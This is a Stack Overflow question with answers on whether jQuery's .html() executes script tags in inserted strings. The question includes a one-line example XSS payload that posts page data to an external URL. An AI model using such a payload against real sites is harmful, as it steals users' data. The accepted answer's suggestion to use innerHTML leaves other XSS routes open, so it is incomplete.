# Is jQuery.html() dangerous?

Tags: javascript, jquery, security

> **Possible Duplicate:**
>   [html() vs innerHTML jquery/javascript & XSS attacks](https://stackoverflow.com/questions/8318581/html-vs-innerhtml-jquery-javascript-xss-attacks)

Is jQuery.html() dangerous?

```
$("#id").html("<span>"+ variable + "</span>");
```

Like in the example above, if variable would have the following value:

```
"<script> $.post("external_url.php", {sesitivedata= $("#someElement").text()}, function() {} ) </script>"
```

Would the script be executed? If so is there any way to allow variable to contain normal html tags but not scripts?

Edit: Added script tag to the string

Comment: `$.html()` does not perform an `eval`. The `eval` would be required to trigger the script execution.

Comment: @Ohgodwhy You are dead wrong. This is trivially easy to test. Open your developer console and execute `$('body div:last').html($("<script>alert('ok')</script>"));`

Answer (score 4, accepted):

Yes, that script will be executed.

http://jsfiddle.net/9ybUJ/2/

The `.html()` implicitly looks out for any script elements and evals them. This is opposite of `.innerHTML` which never executes scripts inside the html.

Comment: Alright, but how do I prevent scripts from being executed? You mean .innerHTML the actual dom property? so $(element).attr("innerHTML", variable) ?

Comment: @Hoffmann I mean the property. `$(element).prop("innerHTML", html)` or `element.innerHTML = html`